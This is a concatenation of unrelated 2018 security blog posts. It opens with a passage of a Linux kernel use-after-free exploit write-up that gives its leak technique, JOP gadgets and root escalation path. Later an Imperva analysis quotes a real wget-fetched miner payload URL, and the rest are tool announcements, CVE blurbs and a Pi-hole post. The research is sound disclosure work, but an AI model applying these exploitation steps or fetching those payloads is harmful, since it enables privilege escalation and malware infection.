This fits in with the kernel's policy of attempting to keep the system running as much as possible by default; if an accidental use-after-free bug occurs here for some reason, the kernel can probably heuristically mitigate its effects and keep the process working.

The policy of only printing a warning even when the kernel has discovered a memory corruption is problematic for systems that should kernel panic when the kernel notices security-relevant events like kernel memory corruption. Simply making WARN() trigger kernel panics isn't really an option because WARN() is also used for various events that are not important to the kernel's security. For this reason, a few uses of WARN_ON() in security-relevant places have been replaced with CHECK_DATA_CORRUPTION(), which permits toggling the behavior between BUG() and WARN() at kernel configuration time. However, CHECK_DATA_CORRUPTION() is only used in the linked list manipulation code and in addr_limit_user_check(); the check in the VMA cache, for example, still uses a classic WARN_ON_ONCE().


A third important change was made to this function; however, this change is relatively recent and will first be in the 4.19 kernel, which hasn't been released yet, so it is irrelevant for attacking currently deployed kernels.

      for (i = 0; i < VMACACHE_SIZE; i++) {
-               struct vm_area_struct *vma = current->vmacache.vmas[i];
+               struct vm_area_struct *vma = current->vmacache.vmas[idx];
-               if (!vma)
-                       continue;
-               if (WARN_ON_ONCE(vma->vm_mm != mm))
-                       break;
-               if (vma->vm_start <= addr && vma->vm_end > addr) {
-                       count_vm_vmacache_event(VMACACHE_FIND_HITS);
-                       return vma;
+               if (vma) {
+#ifdef CONFIG_DEBUG_VM_VMACACHE
+                       if (WARN_ON_ONCE(vma->vm_mm != mm))
+                               break;
+#endif
+                       if (vma->vm_start <= addr && vma->vm_end > addr) {
+                               count_vm_vmacache_event(VMACACHE_FIND_HITS);
+                               return vma;
+                       }
               }
+               if (++idx == VMACACHE_SIZE)
+                       idx = 0;
       }

After this change, the sanity check is skipped altogether unless the kernel is built with the debugging option CONFIG_DEBUG_VM_VMACACHE.

The exploit: Incrementing the sequence number

The exploit has to increment the sequence number roughly 233 times. Therefore, the efficiency of the primitive used to increment the sequence number is important for the runtime of the whole exploit.

It is possible to cause two sequence number increments per syscall as follows: Create an anonymous VMA that spans three pages. Then repeatedly use mmap() with MAP_FIXED to replace the middle page with an equivalent VMA. This causes mmap() to first split the VMA into three VMAs, then replace the middle VMA, and then merge the three VMAs together again, causing VMA cache invalidations for the two VMAs that are deleted while merging the VMAs.

The exploit: Replacing the VMA

Enumerating all potential ways to attack the use-after-free without releasing the slab's backing page (according to /proc/slabinfo, the Ubuntu kernel uses one page per vm_area_struct slab) back to the buddy allocator / page allocator:

  1. Get the vm_area_struct reused in the same process. The process would then be able to use this VMA, but this doesn't result in anything interesting, since the VMA caches of the process would be allowed to contain pointers to the VMA anyway.
  2. Free the vm_area_struct such that it is on the slab allocator's freelist, then attempt to access it. However, at least the SLUB allocator that Ubuntu uses replaces the first 8 bytes of the vm_area_struct (which contain vm_start, the userspace start address) with a kernel address. This makes it impossible for the VMA cache lookup function to return it, since the condition vma->vm_start <= addr && vma->vm_end > addr can't be fulfilled, and therefore nothing interesting happens.
  3. Free the vm_area_struct such that it is on the slab allocator's freelist, then allocate it in another process. This would (with the exception of a very narrow race condition that can't easily be triggered repeatedly) result in hitting the WARN_ON_ONCE(), and therefore the VMA cache lookup function wouldn't return the VMA.
  4. Free the vm_area_struct such that it is on the slab allocator's freelist, then make an allocation from a slab that has been merged with the vm_area_struct slab. This requires the existence of an aliasing slab; in a Ubuntu 18.04 VM, no such slab seems to exist.

Therefore, to exploit this bug, it is necessary to release the backing page back to the page allocator, then reallocate the page in some way that permits placing controlled data in it. There are various kernel interfaces that could be used for this; for example:

pipe pages:
  • advantage: not wiped on allocation
  • advantage: permits writing at an arbitrary in-page offset if splice() is available
  • advantage: page-aligned
  • disadvantage: can't do multiple writes without first freeing the page, then reallocating it

BPF maps:
  • advantage: can repeatedly read and write contents from userspace
  • advantage: page-aligned
  • disadvantage: wiped on allocation

This exploit uses BPF maps.

The exploit: Leaking pointers from dmesg

The exploit wants to have the following information:

  • address of the mm_struct
  • address of the use-after-free'd VMA
  • load address of kernel code

At least in the Ubuntu 18.04 kernel, the first two of these are directly visible in the register dump triggered by WARN_ON_ONCE(), and can therefore easily be extracted from dmesg: The mm_struct's address is in RDI, and the VMA's address is in RAX. However, an instruction pointer is not directly visible because RIP and the stack are symbolized, and none of the general-purpose registers contain an instruction pointer.

A kernel backtrace can contain multiple sets of registers: When the stack backtracing logic encounters an interrupt frame, it generates another register dump. Since we can trigger the WARN_ON_ONCE() through a page fault on a userspace address, and page faults on userspace addresses can happen at any userspace memory access in syscall context (via copy_from_user()/copy_to_user()/...), we can pick a call site that has the relevant information in a register from a wide range of choices. It turns out that writing to an eventfd triggers a usercopy while R8 still contains the pointer to the eventfd_fops structure.

When the exploit runs, it replaces the VMA with zeroed memory, then triggers a VMA lookup against the broken VMA cache, intentionally triggering the WARN_ON_ONCE(). This generates a warning that looks as follows - the leaks used by the exploit are highlighted:

[ 3482.271265] WARNING: CPU: 0 PID: 1871 at /build/linux-SlLHxe/linux-4.15.0/mm/vmacache.c:102 vmacache_find+0x9c/0xb0
[...]
[ 3482.271298] RIP: 0010:vmacache_find+0x9c/0xb0
[ 3482.271299] RSP: 0018:ffff9e0bc2263c60 EFLAGS: 00010203
[ 3482.271300] RAX: ffff8c7caf1d61a0 RBX: 00007fffffffd000 RCX: 0000000000000002
[ 3482.271301] RDX: 0000000000000002 RSI: 00007fffffffd000 RDI: ffff8c7c214c7380
[ 3482.271301] RBP: ffff9e0bc2263c60 R08: 0000000000000000 R09: 0000000000000000
[ 3482.271302] R10: 0000000000000000 R11: 0000000000000000 R12: ffff8c7c214c7380
[ 3482.271303] R13: ffff9e0bc2263d58 R14: ffff8c7c214c7380 R15: 0000000000000014
[ 3482.271304] FS:  00007f58c7bf6a80(0000) GS:ffff8c7cbfc00000(0000) knlGS:0000000000000000
[ 3482.271305] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 3482.271305] CR2: 00007fffffffd000 CR3: 00000000a143c004 CR4: 00000000003606f0
[ 3482.271308] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 3482.271309] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 3482.271309] Call Trace:
[ 3482.271314]  find_vma+0x1b/0x70
[ 3482.271318]  __do_page_fault+0x174/0x4d0
[ 3482.271320]  do_page_fault+0x2e/0xe0
[ 3482.271323]  do_async_page_fault+0x51/0x80
[ 3482.271326]  async_page_fault+0x25/0x50
[ 3482.271329] RIP: 0010:copy_user_generic_unrolled+0x86/0xc0
[ 3482.271330] RSP: 0018:ffff9e0bc2263e08 EFLAGS: 00050202
[ 3482.271330] RAX: 00007fffffffd008 RBX: 0000000000000008 RCX: 0000000000000001
[ 3482.271331] RDX: 0000000000000000 RSI: 00007fffffffd000 RDI: ffff9e0bc2263e30
[ 3482.271332] RBP: ffff9e0bc2263e20 R08: ffffffffa7243680 R09: 0000000000000002
[ 3482.271333] R10: ffff8c7bb4497738 R11: 0000000000000000 R12: ffff9e0bc2263e30
[ 3482.271333] R13: ffff8c7bb4497700 R14: ffff8c7cb7a72d80 R15: ffff8c7bb4497700
[ 3482.271337]  ? _copy_from_user+0x3e/0x60
[ 3482.271340]  eventfd_write+0x74/0x270
[ 3482.271343]  ? common_file_perm+0x58/0x160
[ 3482.271345]  ? wake_up_q+0x80/0x80
[ 3482.271347]  __vfs_write+0x1b/0x40
[ 3482.271348]  vfs_write+0xb1/0x1a0
[ 3482.271349]  SyS_write+0x55/0xc0
[ 3482.271353]  do_syscall_64+0x73/0x130
[ 3482.271355]  entry_SYSCALL_64_after_hwframe+0x3d/0xa2
[ 3482.271356] RIP: 0033:0x55a2e8ed76a6
[ 3482.271357] RSP: 002b:00007ffe71367ec8 EFLAGS: 00000202 ORIG_RAX: 0000000000000001
[ 3482.271358] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 000055a2e8ed76a6
[ 3482.271358] RDX: 0000000000000008 RSI: 00007fffffffd000 RDI: 0000000000000003
[ 3482.271359] RBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000
[ 3482.271359] R10: 0000000000000000 R11: 0000000000000202 R12: 00007ffe71367ec8
[ 3482.271360] R13: 00007fffffffd000 R14: 0000000000000009 R15: 0000000000000000
[ 3482.271361] Code: 00 48 8b 84 c8 10 08 00 00 48 85 c0 74 11 48 39 78 40 75 17 48 39 30 77 06 48 39 70 08 77 8d 83 c2 01 83 fa 04 75 ce 31 c0 5d c3 <0f> 0b 31 c0 5d c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f
[ 3482.271381] ---[ end trace bf256b6e27ee4552 ]---

At this point, the exploit can create a fake VMA that contains the correct mm_struct pointer (leaked from RDI). It also populates other fields with references to fake data structures (by creating pointers back into the fake VMA using the leaked VMA pointer from RAX) and with pointers into the kernel's code (using the leaked R8 from the page fault exception frame to bypass KASLR).

The exploit: JOP (the boring part)

It is probably possible to exploit this bug in some really elegant way by abusing the ability to overlay a fake writable VMA over existing readonly pages, or something like that; however, this exploit just uses classic jump-oriented programming.

To trigger the use-after-free a second time, a writing memory access is performed on an address that has no pagetable entries. At this point, the kernel's page fault handler comes in via page_fault -> do_page_fault -> __do_page_fault -> handle_mm_fault -> __handle_mm_fault -> handle_pte_fault -> do_fault -> do_shared_fault -> __do_fault, at which point it performs an indirect call:

static int __do_fault(struct vm_fault *vmf)
{
struct vm_area_struct *vma = vmf->vma;
int ret;

ret = vma->vm_ops->fault(vmf);

vma is the VMA structure we control, so at this point, we can gain instruction pointer control. R13 contains a pointer to vma. The JOP chain that is used from there on follows; it is quite crude (for example, it crashes after having done its job), but it works.

First, to move the VMA pointer to RDI:

ffffffff810b5c21: 49 8b 45 70           mov rax,QWORD PTR [r13+0x70]
ffffffff810b5c25: 48 8b 80 88 00 00 00  mov rax,QWORD PTR [rax+0x88]
ffffffff810b5c2c: 48 85 c0              test rax,rax
ffffffff810b5c2f: 74 08                 je ffffffff810b5c39
ffffffff810b5c31: 4c 89 ef              mov rdi,r13
ffffffff810b5c34: e8 c7 d3 b4 00        call ffffffff81c03000 <__x86_indirect_thunk_rax>

Then, to get full control over RDI:

ffffffff810a4aaa: 48 89 fb              mov rbx,rdi
ffffffff810a4aad: 48 8b 43 20           mov rax,QWORD PTR [rbx+0x20]
ffffffff810a4ab1: 48 8b 7f 28           mov rdi,QWORD PTR [rdi+0x28]
ffffffff810a4ab5: e8 46 e5 b5 00        call ffffffff81c03000 <__x86_indirect_thunk_rax>

At this point, we can call into run_cmd(), which spawns a root-privileged usermode helper, using a space-delimited path and argument list as its only argument. This gives us the ability to run a binary we have supplied with root privileges. (Thanks to Mark for pointing out that if you control RDI and RIP, you don't have to try to do crazy things like flipping the SM*P bits in CR4, you can just spawn a usermode helper...)

After launching the usermode helper, the kernel crashes with a page fault because the JOP chain doesn't cleanly terminate; however, since that only kills the process in whose context the fault occured, it doesn't really matter.

Fix timeline

This bug was reported 2018-09-12. Two days later, 2018-09-14, a fix was in the upstream kernel tree. This is exceptionally fast, compared to the fix times of other software vendors. At this point, downstream vendors could theoretically backport and apply the patch. The bug is essentially public at this point, even if its security impact is obfuscated by the commit message, which is frequently demonstrated by grsecurity.

However, a fix being in the upstream kernel does not automatically mean that users' systems are actually patched. The normal process for shipping fixes to users who use distribution kernels based on upstream stable branches works roughly as follows:

  1. A patch lands in the upstream kernel.
  2. The patch is backported to an upstream-supported stable kernel.
  3. The distribution merges the changes from upstream-supported stable kernels into its kernels.
  4. Users install the new distribution kernel.

Note that the patch becomes public after step 1, potentially allowing attackers to develop an exploit, but users are only protected after step 4.

In this case, the backport to the upstream-supported stable kernels 4.18, 4.14, 4.9 and 4.4 were published 2018-09-19, five days after the patch became public, at which point the distributions could pull in the patch.

Upstream stable kernel updates are published very frequently. For example, looking at the last few stable releases for the 4.14 stable kernel, which is the newest upstream longterm maintenance release:

4.14.72 on 2018-09-26
4.14.71 on 2018-09-19
4.14.70 on 2018-09-15
4.14.69 on 2018-09-09
4.14.68 on 2018-09-05
4.14.67 on 2018-08-24
4.14.66 on 2018-08-22

The 4.9 and 4.4 longterm maintenance kernels are updated similarly frequently; only the 3.16 longterm maintenance kernel has not received any updates between the most recent update on 2018-09-25 (3.16.58) and the previous one on 2018-06-16 (3.16.57).

However, Linux distributions often don't publish distribution kernel updates very frequently. For example, Debian stable ships a kernel based on 4.9, but as of 2018-09-26, this kernel was last updated 2018-08-21. Similarly, Ubuntu 16.04 ships a kernel that was last updated 2018-08-27. Android only ships security updates once a month. Therefore, when a security-critical fix is available in an upstream stable kernel, it can still take weeks before the fix is actually available to users - especially if the security impact is not announced publicly.

In this case, the security issue was announced on the oss-security mailing list on 2018-09-18, with a CVE allocation on 2018-09-19, making the need to ship new distribution kernels to users clearer. Still: As of 2018-09-26, both Debian and Ubuntu (in releases 16.04 and 18.04) track the bug as unfixed:


Fedora pushed an update to users on 2018-09-22: https://bugzilla.redhat.com/show_bug.cgi?id=1631206#c8

Conclusion

This exploit shows how much impact the kernel configuration can have on how easy it is to write an exploit for a kernel bug. While simply turning on every security-related kernel configuration option is probably a bad idea, some of them - like the kernel.dmesg_restrict sysctl - seem to provide a reasonable tradeoff when enabled.

The fix timeline shows that the kernel's approach to handling severe security bugs is very efficient at quickly landing fixes in the git master tree, but leaves a window of exposure between the time an upstream fix is published and the time the fix actually becomes available to users - and this time window is sufficiently large that a kernel exploit could be written by an attacker in the meantime.

The World’s Most Popular Coding Language Happens to be Most Hackers’ Weapon of Choice

Python will soon be the world’s most prevalent coding language.

That’s quite a statement, but if you look at its simplicity, flexibility and the relative ease with which folks pick it up, it’s not hard to see why The Economist recently touted it as the soon-to-be most used language, globally. Naturally, our threat research team had to poke around and see how popular Python is among bad actors.

And the best place to do that, well, Github, of course. Roughly estimating, more than 20% of GitHub repositories that implement an attack tool / exploit PoC are written in Python. In virtually every security-related topic in GitHub, the majority of the repositories are written in Python, including tools such as w3af , Sqlmap, and even the infamous AutoSploit tool.

At Imperva, we use an advanced intelligent Client Classification mechanism that distinguishes and classifies various web clients. When we take a look at our data, specifically security incidents, the majority of the clients (>25%) we identify — excluding vulnerability scanners — are based on Python.

Unlike other clients, in Python, we see a host of different attack vectors and the usage of known exploits. Hackers, like developers, enjoy Python’s advantages which makes it a popular hacking tool.

Figure 1: Security incidents by client, excluding vulnerability scanners. More than 25% of the clients were Python-based tools used by malicious actors, making it the most common vector for launching exploit attempts.

When examining the use of Python in attacks against sites we protect, the result was unsurprising – a large chunk, up to 77%, of the sites were attacked by a Python-based tool, and in over a third of the cases a Python-based tool was responsible for the majority of daily attacks. These levels, over time, show that Python-based tools are used for both breadth and depth scanning.  

Figure 2: Daily percentage of sites suffering Python-based attacks

Python Modules

The two most popular Python modules used for web attacks are Urllib and Python Requests. The chart below shows attack distribution.  Use of the new module, Async IO, is just kicking off, which makes perfect sense when you consider the vast possibilities the library offers in the field of layer 7 DDoS; especially when using a “Spray N’ Pray” technique:

Python and Known Exploits

The advantages of Python as a coding language make it a popular tool for implementing known exploits. We collected information on the top 10 vulnerabilities recently used by a Python-based tool, and we don’t expect it to stop.

The two most popular attacks in the last 2 months used CVE-2017-9841 – a PHP based Remote Code Execution (RCE) vulnerability in the PHPUnit framework, and CVE-2015-8562 which is a RCE against the Joomla! Framework. It isn’t surprising that the most common attacks had RCE potential, considering how valuable it is to malicious actors.

Another example, which isn’t in the top 10, is CVE-2018-1000207, which had hundreds of attacks each day for several days during the last week of August 2018. Deeper analysis shows that the attack was carried out on multiple protected customers, by a group of IPs from China.

CVEs over time


You can see that the number of CVEs which are being used by attackers, according to our data, has increased in the last few years:

In addition, Python is used to target specific applications and frameworks – below you can find the top 10, according to our data:

When we looked at all the frameworks targeted by Python, the attacks that stand out are those aimed at Struts, WordPress, Joomla and Drupal, which is not surprising as these are currently some of the most popular frameworks out there.

Attack vectors

The most popular HTTP parameter value we’ve seen used in attacks, responsible for around 30% of all different param values used, belongs to a backdoor upload attempt through a PHP Unserialize vulnerability in Joomla! using the JDatabaseDriverMysqli object. The backdoor uploaded payload is hosted on ICG-AuthExploiterBot.

We’ve also seen a recurring payload that turned out to be a Coinbitminer infection attempt, more details on that are in the appendix — note, the appendix is only meant as an example. Since Python is so widely used by hackers, there is a host of different attack vectors to take into consideration. Python requires minimal coding skills, making it easy to write a script and exploit a vulnerability.

Our recommendation

Unless you can differentiate between requests from Python-based tools and any other tool, our recommendations stay the same – make sure to keep security in mind when developing, keep your system up to date with patches, and refrain from any practice that is considered insecure.

Appendix – Example of an Attack

Here’s an interesting, recurring payload we’ve observed (with a small variance at the end):


After base64 decoding it, we get a binary payload:

In the above payload, there is a mention of a GitHub repository for a deserialization exploitation tool and a wget command download in a jpg file, which strongly suggests there is malicious activity. After downloading the file from http://45.227.252.250/jre.jpg we can see that it’s actually a script containing the following:

The two last lines in the script try to get http://45.227.252.250/static/font.jpg%7Cshwhich is identified as Trojan. Coinbitminer by Symantec Endpoint Protection.

This finding relates to a tweet from the end of August 2018, talking about a new Apache Struts vulnerability CVE-2018-11776 used to infect with the same Coinbitminer.
While you’re here, also read: Imperva Python SDK – We’re All Consenting SecOps Here

The post The World’s Most Popular Coding Language Happens to be Most Hackers’ Weapon of Choice appeared first on Blog.

New SEI CERT Tool Extracts Artifacts from Free Text for Incident Report Analysis

This post is co-authored with Sam Perl.

The CERT Division of the Software Engineering Institute (SEI) at Carnegie Mellon University recently released the Cyobstract Python library as an open source tool. You can use it to quickly and efficiently extract artifacts from free text in a single report, from a collection of incident reports, from threat assessment summaries, or any other textual source.

Cybersecurity teams need to collect and process data from incident reports, blog posts, news feeds, threat reports, IT tickets, incident tickets, and more. Often incident analysts are looking for technical artifacts to help in their investigation of a threat and development of a mitigation. This activity is often done manually by cutting and pasting between sources and tools. Cyobstract helps extract key artifact values from any kind of text, allowing incident analysts to focus their attention on processing the data once it's extracted. Once artifact values are extracted, they can be more easily correlated across multiple datasets.

After using Cyobstract to extract security-relevant data types, the data can be used for higher level downstream analysis and investigation of source incident reports and data. The resulting data can also be loaded into a database, such as an indicator database. Using Cyobstract, the extracted artifacts can be used to quickly and easily find commonality and similarity across reports, thereby potentially revealing patterns that might otherwise have remained hidden.

At its core, the Cyobstract library is built around a collection of robust regular expressions that target 24 specific security-relevant data types of potential interest, including the following:

  • IP addresses: IPv4, IPv4 CIDR, IPv4 range, IPv6, IPv6 CIDR, and IPv6 range
  • hashes: MD5, SHA1, SHA256, and ssdeep
  • Internet and system-related strings: FQDN, URL, user agent strings, email addresses, filenames, filepath, and registry keys
  • Internet infrastructure values: ASN, ASN owner, country, and ISP
  • security analysis values: CVE, malware, and attack type

Cyobstract is capable of extracting these artifacts even if they are malformed in some way. For example, in the incident response community, it's often standard practice for teams to "defang" indicators of compromise before storing them or sending them to another team. Defanged indicator values can be difficult for automated solutions to extract. There is no standard practice for defanging, so there are many ways it can be done. Cyobstract was built from a large collection of real incident reports from many organizations so it can handle many ways of defanging that CERT researchers have observed in the field.

In addition to the core extraction library, Cyobstract includes developer tools that teams can use to craft their own regular expressions and capture custom security data types. Analysts typically do this by using a list of names to extract; however, over time, that list can be large and slow to use in matching. Using Cyobstract, analysts can input their lists of terms to match (such as a list of common malware names) and get an optimized regex as output. This expression is significantly faster than trying to match directly to a name on a list.

The library also includes benchmarking tools that can track the effect of changes to regular expressions and present the analyst with feedback on the overall effectiveness of the individual change (e.g., this regex change found three more reports than the previous version).

The Cyobstract library can be downloaded from GitHub at https://github.com/cmu-sei/cyobstract.

CVE-2018-1610 (rational_doors_next_generation)

IBM Rational DOORS Next Generation 5.0 through 5.0.2 and 6.0 through 6.0.6 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 143931.

CVE-2018-7907 (agassi-l09_firmware, agassi-w09_firmware, baggio2-u01a_firmware, bond-al00c_firmware, bond-al10b_firmware, bond-tl10b_firmware, bond-tl10c_firmware, haydn-l1jb_firmware, kobe-l09a_firmware, kobe-l09ahn_firmware, kobe-w09c_firmware, lelandp-l22c_firmware, lelandp-l22d_firmware, rhone-al00_firmware, selina-l02_firmware, stanford-l09s_firmware, toronto-al00_firmware, toronto-al00a_firmware, toronto-tl10_firmware)

Some Huawei products Agassi-L09 AGS-L09C100B257CUSTC100D001, AGS-L09C170B253CUSTC170D001, AGS-L09C199B251CUSTC199D001, AGS-L09C229B003CUSTC229D001, Agassi-W09 AGS-W09C100B257CUSTC100D001, AGS-W09C128B252CUSTC128D001, AGS-W09C170B252CUSTC170D001, AGS-W09C229B251CUSTC229D001, AGS-W09C331B003CUSTC331D001, AGS-W09C794B001CUSTC794D001, Baggio2-U01A BG2-U01C100B160CUSTC100D001, BG2-U01C170B160CUSTC170D001, BG2-U01C199B162CUSTC199D001, BG2-U01C209B160CUSTC209D001, BG2-U01C333B160CUSTC333D001, Bond-AL00C Bond-AL00CC00B201, Bond-AL10B Bond-AL10BC00B201, Bond-TL10B Bond-TL10BC01B201, Bond-TL10C Bond-TL10CC01B131, Haydn-L1JB HDN-L1JC137B068, Kobe-L09A KOB-L09C100B252CUSTC100D001, KOB-L09C209B002CUSTC209D001, KOB-L09C362B001CUSTC362D001, Kobe-L09AHN KOB-L09C233B226, Kobe-W09C KOB-W09C128B251CUSTC128D001, LelandP-L22C 8.0.0.101(C675CUSTC675D2), LelandP-L22D 8.0.0.101(C675CUSTC675D2), Rhone-AL00 Rhone-AL00C00B186, Selina-L02 Selina-L02C432B153, Stanford-L09S Stanford-L09SC432B183, Toronto-AL00 Toronto-AL00C00B223, Toronto-AL00A Toronto-AL00AC00B223, Toronto-TL10 Toronto-TL10C01B223 have a sensitive information leak vulnerability. An attacker can trick a user to install a malicious application to exploit this vulnerability. Due to insufficient verification of the input, successful exploitation can cause sensitive information leak.

Google promises a fix for Chrome’s auto account-sign-in snafu, but you can stop it right now

Google’s Chrome 69 hides a disturbing twist: if you log into Gmail or another Google service, Chrome seems to automatically log you into the browser as well. Theoretically, that means that you will automatically begin sharing data with Google, like it or not.

The confusion comes from a new way in which Google shows your “logged in” status. Previously, if you were signed in to Chrome, an icon would appear in the upper right-hand corner, indicating that you were signed in and sharing data. The same icon now appears if you’re logged into a Google service like Google.com or Gmail, but not necessarily to Chrome. 

Update 9/26/18: Google has announced upcoming changes to the way Chrome 70 handles sign-ins to address this issue.

To read this article in full, please click here

Effortless security feature detection with Winchecksec

We’re proud to announce the release of Winchecksec, a new open-source tool that detects security features in Windows binaries. Developed to satisfy our analysis and research needs, Winchecksec aims to surpass current open-source security feature detection tools in depth, accuracy, and performance without sacrificing simplicity.

Feature detection, made simple

Winchecksec takes a Windows PE binary as input, and outputs a report of the security features baked into it at build time. Common features include:

  • Address-space layout randomization (ASLR) and 64-bit-aware high-entropy ASLR (HEASLR)
  • Authenticity/integrity protections (Authenticode, Forced Integrity)
  • Data Execution Prevention (DEP), better known as W^X or No eXecute (NX)
  • Manifest isolation
  • Structured Exception Handling (SEH) and SafeSEH
  • Control Flow Guard (CFG) and Return Flow Guard (RFG)
  • Guard Stack (GS), better known as stack cookies or canaries

Winchecksec’s two output modes are controlled by one flag (-j): the default plain-text tabular mode for humans, and a JSON mode for machine consumption. In action:

unnamed

Did you notice that Winchecksec distinguishes between “Dynamic Base” and ASLR above? This is because setting /DYNAMICBASE at build-time does not guarantee address-space randomization. Windows cannot perform ASLR without a relocation table, so binaries that explicitly request ASLR but lack relocation entries (indicated by IMAGE_FILE_RELOCS_STRIPPED in the image header’s flags) are silently loaded without randomized address spaces. This edge case was directly responsible for turning an otherwise moderate use-after-free in VLC 2.2.8 into a gaping hole (CVE-2017-17670). The underlying toolchain error in mingw-w64 remains unfixed.

Similarly, applications that run under the CLR are guaranteed to use ASLR and DEP, regardless of the state of the Dynamic Base/NX compatibility flags or the presence of a relocation table. As such, Winchecksec will report ASLR and DEP as enabled on any binary that indicates that it runs under the CLR. The CLR also provides safe exception handling but not via SafeSEH, so SafeSEH is not indicated unless enabled.

How do other tools compare?

Not well:

  • Microsoft released BinScope in 2014, only to let it wither on the vine. BinScope performs several security feature checks and provides XML and HTML outputs, but relies on .pdb files for its analysis on binaries. As such, it’s impractical for any use case outside of the Microsoft Secure Development Lifecycle. BinSkim appears to be the spiritual successor to BinScope and is actively maintained, but uses an obtuse overengineered format for machine consumption. Like BinScope, it also appears to depend on the availability of debugging information.
  • The Visual Studio toolchain provides dumpbin.exe, which can be used to dump some of the security attributes present in the given binary. But dumpbin.exe doesn’t provide a machine-consumable output, so developers are forced to write ad-hoc parsers. To make matters worse, dumpbin.exe provides a dump, not an analysis, of the given file. It won’t, for example, explain that a program with stripped relocation entries and Dynamic Base enabled isn’t ASLR-compatible. It’s up to the user to put two and two together.
  • NetSPI maintains PESecurity, a PowerShell script for testing many common PE security features. While it provides a CSV output option for programmatic consumption, it lags in performance compared to dumpbin.exe (and other compiled tools listed below), much less Winchecksec.
  • There are a few small feature detectors floating around the world of plugins and gists, like this one, this one, and this one (for x64dbg!). These are generally incomplete (in terms of checks), difficult to interact with programmatically, sporadically maintained, and/or perform ad-hoc PE parsing. Winchecksec aims for completeness in the domain of static checks, is maintained, and uses official Windows APIs for PE parsing.

Try it!

Winchecksec was developed as part of Sienna Locomotive, our integrated fuzzing and triaging system. As one of several triaging components, Winchecksec informs our exploitability scoring system (reducing the exploitability of a buffer overflow, for example, if both DEP and ASLR are enabled) and allows us to give users immediate advice on improving the baseline security of their applications. We expect that others will develop additional use cases, such as:

  • CI/CD integration to make a base set of security features mandatory for all builds.
  • Auditing entire production servers for deployed applications that lack key security features.
  • Evaluating the efficacy of security features in applications (e.g., whether stack cookies are effective in a C++ application with a large number of buffers in objects that contain vtables).

Get Winchecksec on GitHub now. If you’re interested in helping us develop it, try out this crop of first issues.

Don’t Hit Me Up – Application Security Weekly #33

This week, Keith and special guest host April Wright interview Ron Gula, Founder of Tenable and Gula Tech Adventures! They discuss security in the upcoming elections, how to maintain separation of duties, attack simulation, and more! In the Application Security News, Hackers stole customer credit cards in Newegg data breach, John Hancock now requires monitoring bracelets to buy insurance, the man who broke Ticketmaster, new security settings available in iOS 12, State Department confirms data breach exposed employee data, and more!

 

Full Show Notes: https://wiki.securityweekly.com/ASW_Episode33

 

Visit https://www.securityweekly.com/asw for all the latest episodes!

 

Visit https://www.activecountermeasures/asw to sign up for a demo or buy our AI Hunter!

 

→Visit our website: https://www.securityweekly.com

→Follow us on Twitter: https://www.twitter.com/securityweekly

→Like us on Facebook: https://www.facebook.com/secweekly

Mmm… Pi-hole…

Presently sponsored by: Netsparker - a scalable and dead accurate web application security solution. Scan thousands of web applications within just hours.

Mmm... Pi-hole...

I have a love-hate relationship with ad blockers. On the one hand, I despise the obnoxious ads that are forced down our throats at what seems like every turn. On the other hand, I appreciate the need for publishers to earn a living so that I can consume their hard-earned work for free. Somewhere in the middle is a responsible approach, for example the sponsorship banner you see at the top of this blog. Companies I choose to partner with get to appear there and they get themselves 140 characters and a link. That is all. No images. No video. No script. No HTML tags. No tracking. Sponsors are happy as they get exposure, visitors are happy because there's none of the aforementioned crap and I'm happy because it pays a lot better than ads ever did anyway. It almost seems like everyone is happy. Almost...

As I wrote about a couple of years ago, ad blockers aren't always happy and frankly, attitudes like that just make the whole ad problem even worse. That post attracted hundreds of comments ranging from "I don't mind ads" to "burn them all with fire and the consequences be damned". But it's not just the detrimental impact of blocking the very source of a website's revenue that worries me, it's also the fact that running an ad blocker means giving a third party an enormous amount of power over your browser. This creates a different risk to ads themselves - a much more serious one if it comes to fruition - and it looks like this:

That's actually my top tweet over the last 4 weeks by a significant margin because it's one we can all relate to. I certainly went back and revisited all the browser extensions I had installed and killed a few unnecessary ones. Bottom line is that you really want to consider how much you trust the organisation (or in many cases, the person) behind the extensions you run and even when you do, there's no guarantee it won't be backdoored MEGA.nz style.

Which brings me to Pi-hole. I'm going to keep the intro bits as brief as possible but, in a nutshell, Pi-hole is a little DNS server you run on a Raspberry Pi in your local network then point your router at such that every device in your home resolves DNS through the service. It then blacklists about 130k domains used for nasty stuff such that when any client on your network (PC, phone, smart TV) requests sleazy-ad-domain.com, the name just simply doesn't resolve. Scott Helme put me onto this originally via his two excellent posts on Securing DNS across all of my devices with Pi-Hole + DNS-over-HTTPS + 1.1.1.1 and Catching and dealing with naughty devices on my home network. Go and read those because I'm deliberately not going to repeat them here. In fact, I hadn't even planned to write anything until I saw how much difference the service actually made. More on that in a moment, the one other bit I'll add here is that the Raspberry Pi I purchased for the setup was the Little Bird Raspberry Pi 3 Plus Complete Starter Kit:

Mmm... Pi-hole...

This just made it a super easy turnkey solution. Plus, Little Bird Electronics down here in Aus delivered it really quickly and followed up with a personal email and a "thank you" for some of the other unrelated stuff I've been up to lately. Nice 🙂

I went with an absolute bare bones setup which essentially involved just following the instructions on the Pi-hole site (Scott gets a bit fancier in his blog posts). I had a bit of a drama due to some dependencies and after a quick tweet for help this morning followed by a question on Discourse, I was up and running. I set my Ubiquiti network to resolve DNS through the Pi and that's it - job done! As devices started picking up the new DNS settings, I got to see just how much difference was made. I set my desktop to manually resolve through Cloudflare's 1.1.1.1 whilst my laptop was using the Pi-hole which made for some awesome back to back testing. Here's what I found:

Let's take a popular local Aussie news site, news.com.au. Here's what it looks like with no Pi-hole:

Mmm... Pi-hole...

In the grand scheme of ads on sites, not too offensive. Let's look at it from the machine routing through the Pi-hole:

Mmm... Pi-hole...

Visually, there's not a whole lot of difference here. However, check out the network requests at the bottom of the browser before and after Pi-hole:

Mmm... Pi-hole...

Mmm... Pi-hole...

Whoa! That's an 80% reduction in network requests and an 82% reduction in the number of bytes transferred. I'd talk about the reduction in load time too except it's really hard to measure because as you can see from the waterfall diagrams, with no Pi-hole it just keeps going and going and, well, it all gets a bit silly.

